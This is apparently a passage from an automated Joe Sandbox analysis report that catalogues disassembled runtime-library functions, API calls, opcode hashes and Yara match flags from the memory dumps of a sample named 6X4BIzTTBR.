                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorLast$_memcmp
                                                      • String ID: "1@
                                                      • API String ID: 4275183328-1946750398
                                                      • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                      • Instruction ID: d841e48d86bd86cadc75f002ab81185c2c7fc1b705aadc8dfd5545e49cc2a5d7
                                                      • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                      • Instruction Fuzzy Hash: 6BB13975A012199FDB24DF18C894AAEB7B4FB08314F1086EAE949A7360D775AE90CF44
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • _free.LIBCMT ref: 04701454
                                                      • _free.LIBCMT ref: 0470146D
                                                      • _free.LIBCMT ref: 0470149F
                                                      • _free.LIBCMT ref: 047014A8
                                                      • _free.LIBCMT ref: 047014B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorLast
                                                      • String ID: "1@$C
                                                      • API String ID: 3291180501-1527998705
                                                      • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                      • Instruction ID: 3ad9fb12e19344664ea20e6cf7682c45aa1ae7bcd4176b6723654c26b958ac2d
                                                      • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                      • Instruction Fuzzy Hash: 19B1FA75A02219DFDB24DF19C884AADB7F4FB48304F5485AAE949A7390E731BE90CF40
                                                      APIs
                                                      • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 046F3061
                                                        • Part of subcall function 046E8AC2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 046E8ACD
                                                      • SafeSQueue.LIBCONCRT ref: 046F307A
                                                      • Concurrency::location::_Assign.LIBCMT ref: 046F313A
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046F315B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F3169
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                      • String ID: "1@
                                                      • API String ID: 3496964030-1946750398
                                                      • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                      • Instruction ID: ed67b3e7ba8576252d661e306cca22468a20570ed2bb4ff2166babb96eef5691
                                                      • Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                      • Instruction Fuzzy Hash: 5731FF316006129FDB25EF69C850ABAB7B4FF44714B14815EDE8A8B342EB30F885CBD4
                                                      APIs
                                                      • atomic_compare_exchange.LIBCONCRT ref: 046EC6EC
                                                      • atomic_compare_exchange.LIBCONCRT ref: 046EC710
                                                      • std::_Cnd_initX.LIBCPMT ref: 046EC721
                                                      • std::_Cnd_initX.LIBCPMT ref: 046EC72F
                                                        • Part of subcall function 046D1370: __Mtx_unlock.LIBCPMT ref: 046D1377
                                                      • std::_Cnd_initX.LIBCPMT ref: 046EC73F
                                                        • Part of subcall function 046EC3FF: __Cnd_broadcast.LIBCPMT ref: 046EC406
                                                      • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 046EC74D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                      • String ID: "1@
                                                      • API String ID: 4258476935-1946750398
                                                      • Opcode ID: 376dd05e34ba58b9b10a3a6bde49d9aa46fe1a70e88f5238d9b7e165f1bafb18
                                                      • Instruction ID: 67b9d7a9b72faab840999e3c100505c0e5529cc058ca1234a038b059f9e71dca
                                                      • Opcode Fuzzy Hash: 376dd05e34ba58b9b10a3a6bde49d9aa46fe1a70e88f5238d9b7e165f1bafb18
                                                      • Instruction Fuzzy Hash: 8C01F275902601ABEB10FBA5CD44BADB798BF05318F100419E80497280FBB8FB018699
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C68D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: +3@$W(@$W(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-3836649521
                                                      • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                      • Instruction ID: 2fc2638fc067e40ae9a827f57275e2f0d78baaf5b1a7619cdab41ba603d7e27a
                                                      • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                      • Instruction Fuzzy Hash: F0F0FC72900104AAC714DB54DC42FAB33945B15345F14867BED55B71C3EA7DA909CB9C
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D948,0042D948,?,?,?,00432395,00000001,00000001,23E85006), ref: 0043219E
                                                      • __alloca_probe_16.LIBCMT ref: 004321D6
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432395,00000001,00000001,23E85006,?,?,?), ref: 00432224
                                                      • __alloca_probe_16.LIBCMT ref: 004322BB
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043231E
                                                      • __freea.LIBCMT ref: 0043232B
                                                        • Part of subcall function 004336B7: RtlAllocateHeap.NTDLL(00000000,0040D886,00000000,?,004267AE,00000002,00000000,00000000,00000000,?,0040CD37,0040D886,00000004,00000000,00000000,00000000), ref: 004336E9
                                                      • __freea.LIBCMT ref: 00432334
                                                      • __freea.LIBCMT ref: 00432359
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3864826663-0
                                                      • Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                      • Instruction ID: f7233cfb18756418db21c11bcc2c8e0fe6e8002e1dcf582c165aec8b448a06b4
                                                      • Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                      • Instruction Fuzzy Hash: A8512432600216AFDB258F71CD41EBF77A9EB48B54F14526AFD04E6280EBBCDD40C698
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                      • Instruction ID: 3880426677173abbed0f82bf47eb0a29bbee263204947e67d521e7754b09f7f0
                                                      • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                      • Instruction Fuzzy Hash: 6C61E371900205AFDB24DF65C842BAEBBF4EF09310F1451AFE894EB392D7399D418B99
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                      • Instruction ID: 1f77944d06082f767374f441c4d4446cefa220c4a1b48c1bb5ed6cb744d1599e
                                                      • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                      • Instruction Fuzzy Hash: 2461AF71A02305EFEB20DF68C941B9ABBF4EB59714F14817AED44EB381E732A9419B50
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(?,0042C24D,E0830C40,?,?,?,?,?,?,00434008,0040DDEB,0042C24D,?,0042C24D,0042C24D,0040DDEB), ref: 004338D5
                                                      • __fassign.LIBCMT ref: 00433950
                                                      • __fassign.LIBCMT ref: 0043396B
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,0042C24D,00000001,?,00000005,00000000,00000000), ref: 00433991
                                                      • WriteFile.KERNEL32(?,?,00000000,00434008,00000000,?,?,?,?,?,?,?,?,?,00434008,0040DDEB), ref: 004339B0
                                                      • WriteFile.KERNEL32(?,0040DDEB,00000001,00434008,00000000,?,?,?,?,?,?,?,?,?,00434008,0040DDEB), ref: 004339E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                      • Instruction ID: 8c98482b7363d9b7a2856aa464f0f17ba8f66f594d3c239b4ce77d00e47267ce
                                                      • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                      • Instruction Fuzzy Hash: A751D2B0E00249AFDB10DFA8D881BEEBBF4EF09311F14412BE556E7291D7749A41CB69
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(?,046FC4B4,E0830C40,?,?,?,?,?,?,0470426F,046DE052,046FC4B4,?,046FC4B4,046FC4B4,046DE052), ref: 04703B3C
                                                      • __fassign.LIBCMT ref: 04703BB7
                                                      • __fassign.LIBCMT ref: 04703BD2
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,046FC4B4,00000001,?,00000005,00000000,00000000), ref: 04703BF8
                                                      • WriteFile.KERNEL32(?,?,00000000,0470426F,00000000,?,?,?,?,?,?,?,?,?,0470426F,046DE052), ref: 04703C17
                                                      • WriteFile.KERNEL32(?,046DE052,00000001,0470426F,00000000,?,?,?,?,?,?,?,?,?,0470426F,046DE052), ref: 04703C50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                      • Instruction ID: d2499ce698665b88352d8150edbd06b60f5e7c9d2070ea61630fcf0a92e1e5d4
                                                      • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                      • Instruction Fuzzy Hash: D651D674A01209EFDB10CFA8D888AEEBBF4EF09700F15851AE955E73D1E730A955CB64
                                                      APIs
                                                      • _SpinWait.LIBCONCRT ref: 046EB162
                                                        • Part of subcall function 046E1198: _SpinWait.LIBCONCRT ref: 046E11B0
                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 046EB176
                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 046EB1A8
                                                      • List.LIBCMT ref: 046EB22B
                                                      • List.LIBCMT ref: 046EB23A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                      • String ID: &+A
                                                      • API String ID: 3281396844-3022679855
                                                      • Opcode ID: a702d5991f5cc7149a24a86390a7b934e26dc465f4abd9ece5b58599af1ffa23
                                                      • Instruction ID: 3f267437aae8e86de638d32e193a912d4b224868e59a35af8c1ba95950734c6c
                                                      • Opcode Fuzzy Hash: a702d5991f5cc7149a24a86390a7b934e26dc465f4abd9ece5b58599af1ffa23
                                                      • Instruction Fuzzy Hash: E3318831A02656DFDB14EFA6C5906FDB7F0BF05B18F04006EC8416B251EB727904CB98
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                      • Instruction ID: 911517836775829f1f0f495c823dc359ab1313930e1a31c9a79f2c9c58edb12b
                                                      • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                      • Instruction Fuzzy Hash: 4C112772A00215BFC7203F77AC04F6B7A6CEF8A725F10123BF815D3341DA3889049269
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                      • Instruction ID: ba09d6e0135593509ac972da153ce5c013711dbd09e4059f5980ee60cf1f9450
                                                      • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                      • Instruction Fuzzy Hash: F2110672606214FFEB306F72DC4896B3AECEF82724B108629FC15D7390EA71A804C664
                                                      APIs
                                                        • Part of subcall function 0043A0DA: _free.LIBCMT ref: 0043A103
                                                      • _free.LIBCMT ref: 0043A3E1
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 0043A3EC
                                                      • _free.LIBCMT ref: 0043A3F7
                                                      • _free.LIBCMT ref: 0043A44B
                                                      • _free.LIBCMT ref: 0043A456
                                                      • _free.LIBCMT ref: 0043A461
                                                      • _free.LIBCMT ref: 0043A46C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction ID: bf2b5824ba8fe7ccd3aa20c0db96b829e97de71ed8586692ff537644c7358fa4
                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction Fuzzy Hash: 1C11AF33580B04AAD931BFB2CC07FCB77AC6F18305F40581EB6EA76192CA2DB5109746
                                                      APIs
                                                        • Part of subcall function 0470A341: _free.LIBCMT ref: 0470A36A
                                                      • _free.LIBCMT ref: 0470A648
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 0470A653
                                                      • _free.LIBCMT ref: 0470A65E
                                                      • _free.LIBCMT ref: 0470A6B2
                                                      • _free.LIBCMT ref: 0470A6BD
                                                      • _free.LIBCMT ref: 0470A6C8
                                                      • _free.LIBCMT ref: 0470A6D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction ID: ece5ff10396963fc2fe79f96d9176e9ef6fa33897fd431b7b4f39b08b0a9a510
                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction Fuzzy Hash: 81118171542F04EBE920B7B1CC4DFCBB7DCDF01708F408A14A699A63D0DAB6B5545650
                                                      APIs
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412410
                                                      • GetLastError.KERNEL32 ref: 00412416
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412443
                                                      • GetLastError.KERNEL32 ref: 0041244D
                                                      • GetLastError.KERNEL32 ref: 0041245F
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412475
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412483
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID:
                                                      • API String ID: 4227777306-0
                                                      • Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                      • Instruction ID: 65bc4c89bc166e9a91a801661d5392fc9f10abb9af920915c97cd1159a2059f3
                                                      • Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                      • Instruction Fuzzy Hash: 01017038600011A7C710AF61ED05FEF376CEF42B52B50042BF505D3151DBACD954866D
                                                      APIs
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 046E2677
                                                      • GetLastError.KERNEL32 ref: 046E267D
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 046E26AA
                                                      • GetLastError.KERNEL32 ref: 046E26B4
                                                      • GetLastError.KERNEL32 ref: 046E26C6
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E26DC
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E26EA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID:
                                                      • API String ID: 4227777306-0
                                                      • Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                      • Instruction ID: 1d567ab31e5984373cdb3413795ba08a70ccd79209821ead8d49c6f11f1f2bdc
                                                      • Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                      • Instruction Fuzzy Hash: 59014C34702119E7EB10BF62DC08BBF37ADAF42A51B100669F001D3150FB20F50487AC
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,046E671B), ref: 046E24C6
                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 046E24D4
                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 046E24E2
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,046E671B), ref: 046E2510
                                                      • GetProcAddress.KERNEL32(00000000), ref: 046E2517
                                                      • GetLastError.KERNEL32(?,?,?,046E671B), ref: 046E2532
                                                      • GetLastError.KERNEL32(?,?,?,046E671B), ref: 046E253E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E2554
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E2562
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID: kernel32.dll
                                                      • API String ID: 4179531150-1793498882
                                                      • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                      • Instruction ID: 539b940d03f5c036ee15da3e71d874dd3418307f576a2b12500499311fb80b7d
                                                      • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                      • Instruction Fuzzy Hash: B0F0D1769123103FB6103B7A7D9D82A3EEDDD56A22320066AF412D2291FB34AA00866C
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEA5,00000003,?,0042FE45,00000003,00457970,0000000C,0042FF9C,00000003,00000002), ref: 0042FF14
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF27
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEA5,00000003,?,0042FE45,00000003,00457970,0000000C,0042FF9C,00000003,00000002,00000000), ref: 0042FF4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: "1@$CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-4179296187
                                                      • Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                      • Instruction ID: d60dd429fcd1d8a997d810f584a2a414c89b853b4e03cec3e2f3c9fad185977b
                                                      • Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                      • Instruction Fuzzy Hash: 6AF0C830A00219BBDB119F50DD09B9EBFB4EF05B12F5100B6F905B2290CB799E44DA4C
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,047025FC,00000001,00000001,?), ref: 04702405
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,047025FC,00000001,00000001,?,?,?,?), ref: 0470248B
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04702585
                                                      • __freea.LIBCMT ref: 04702592
                                                        • Part of subcall function 0470391E: RtlAllocateHeap.NTDLL(00000000,046DDAED,00000000), ref: 04703950
                                                      • __freea.LIBCMT ref: 0470259B
                                                      • __freea.LIBCMT ref: 047025C0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                      • Instruction ID: ef7f9df01b44768060b27888b004e6d3e3a0d87db2662eef604890b65c79866c
                                                      • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                      • Instruction Fuzzy Hash: B851D273601216EBEB258F64CC58EBE77E9EB48754F2586A8FC04E6281EB34FC40C654
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID:
                                                      • API String ID: 4189289331-0
                                                      • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                      • Instruction ID: a6868844fc0e59c45370a21c37bd4e4667a9c99832b586a95a348d00afa15710
                                                      • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                      • Instruction Fuzzy Hash: ED51E972900205ABEF209F68CC44FAE7BA9AF59334F14421DEA55D63E1FB37F9018664
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                      • String ID:
                                                      • API String ID: 1687354797-0
                                                      • Opcode ID: 9bbf6c831fd912da87baf57c36a4887fcd0ef6c58bda06b470faafc8a7fe9ad1
                                                      • Instruction ID: 8bfdb4cb9171e4105d4bd6ab79f7eecef5b7913d76f1a314fb5348e78e8f966f
